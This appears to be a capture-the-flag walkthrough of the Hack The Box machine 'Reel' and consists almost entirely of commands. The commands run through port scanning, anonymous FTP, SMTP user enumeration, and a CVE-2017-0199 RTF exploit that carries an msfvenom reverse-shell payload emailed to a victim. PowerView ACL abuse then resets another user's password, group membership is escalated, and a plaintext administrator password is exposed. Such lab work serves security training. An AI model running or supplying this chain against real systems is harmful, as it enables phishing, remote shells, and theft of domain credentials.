Reel

Reel


HTB Windows

nmap -A -p- -oA reel 10.10.10.77 --min-rate=10000 --script=vuln --script-timeout=15 -v

echo "10.10.10.77 reel.htb" | sudo tee -a /etc/hosts

nmap -sC -sV -O -p- -oA reel 10.10.10.77

nmap -sU -O -p- -oA reel 10.10.10.77

whichSystem 10.10.10.77

ssh_command. nmap -p- --open -T5 -v -n 10.10.10.77

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.77 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p80,5985,8080 10.129.229.57 -oN targeted

ssh_command.

ftp 10.10.10.77

anonymous:anonymous

cd documents

prompt off

mget *

cat readme.txt

ssh_command.

exiftool *.docx

ssh_command.

telnet 10.10.10.77 25

HELP

HELO cu3rv0x

VRFY nico@megabank.com

MAIL FROM <cu3rv0x@megabank.com>

RCPT TO: <test@megabank.com>

quit

ssh_command.

cat users.txt

smtp-user-enum -M RCPT -U users.txt -t 10.10.10.77

ssh_command.

git clone https://github.com/bhdresh/CVE-2017-0199.git

cd CVE-2017-0199

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f hta-psh -o malicioso.hta

ssh_command.

python2 cve-2017-0199_toolkit.py -M gen -w salario.rtf -u http://10.10.14.4/malicioso.hta -t RTF -x 0

python -m http.server 80

ssh_command.

rlwrap nc -lvnp 443

sendEmail -f cu3rv0x@megabank.com -t nico@megabank.com -u "Salario" -m "Ver salarios de todos los colegas" -s 10.10.10.77:25 -a salario.rtf -v

ssh_command.

type C:\Users\nico\Desktop\user.txt

ssh_command.

powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.getNetworkCredential() | Format-LIst *"

ssh_command.

ssh Tom@10.10.10.77

ssh_command. cd Desktop

cd AD Audit

ssh_command.

ssh_command.

smbserver.py smbFolder $(pwd) -smb2support

copy acls.csv \\10.10.14.4\acls.csv

ssh_command.

libreoffice acls.csv

ssh_command.

net user

ssh_command.

powershell

Import-Module .\PowerView.ps1

ssh_command.

cat PowerView.ps1 | grep "^function" | grep DomainObject

ssh_command.

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom

Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights Resetpassword

$cred = ConvertTo-SecureString "cu3rv0x321$!" -AsPlainText -Force

Set-DomainUserPassword -Identity claire -AccountPassword $cred

ssh_command.

ssh_command.

ssh claire@10.10.10.77

net group

net user claire

ssh_command.

Vemos que no somos parte del grupo backup_admins

net group backup_admins

ssh_command.

net group backup_admins claire /add

net group backup_admins

ssh_command.

icacls Administrator

cd Administrator\Desktop

type BackupScript.ps1

ssh_command.

administrator:Cr4ckMeIfYouC4n!

ssh administrator@10.10.10.77

type root.txt

ssh_command.

© 2024 Cu3rv0x